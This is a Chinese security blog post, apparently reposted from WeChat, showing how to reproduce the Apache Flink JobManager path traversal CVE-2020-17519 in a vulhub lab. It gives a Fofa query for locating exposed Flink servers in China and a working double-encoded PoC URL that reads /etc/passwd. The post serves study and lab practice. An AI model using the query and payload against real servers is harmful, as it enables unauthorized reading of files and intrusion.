前言说明:
Apache Flink 是一个开源流处理框架,具有强大的流处理和批处理能力。
Apache Flink 1.11.0 中引入的一项更改(也在 1.11.1 和 1.11.2 中发布)允许攻击者通过 JobManager 进程的 REST 接口读取 JobManager 本地文件系统上的任何文件。
Fofa语句查询:
country="CN" && js_name="runtime.0dcf16aad31edd73d8e8.js"
漏洞存在占比大概十分之六(按搜索出的单页面统计)
正文:
环境搭建:
我们使用vulhub进行环境搭建,具体漏洞打开目录:
/vulhub-master/flink/CVE-2020-17519
开启命令:
docker-compose up -d
打开成功后访问http://192.168.0.110:8081/#/submit即可红色部分换成你自己的靶机IP
这样即可完成搭建工作
漏洞利用:
利用方式很简单,直接构建poc
http://192.168.0.110:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
IP换成你自己的即可,读取网站中/etc/passwd目录
这里对%252f解释一下,这个是对/进行url编码加密两次后的值
参考文章:
https://vulhub.org/#/environments/flink/CVE-2020-17519/
作者:【白】
交流群:70844080
公众号:白安全组
仅供学习研究
有什么问题大家可以在文章下方留言
原文始发于微信公众号(白安全组):Apache Flink路径遍历 (CVE-2020-17519)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论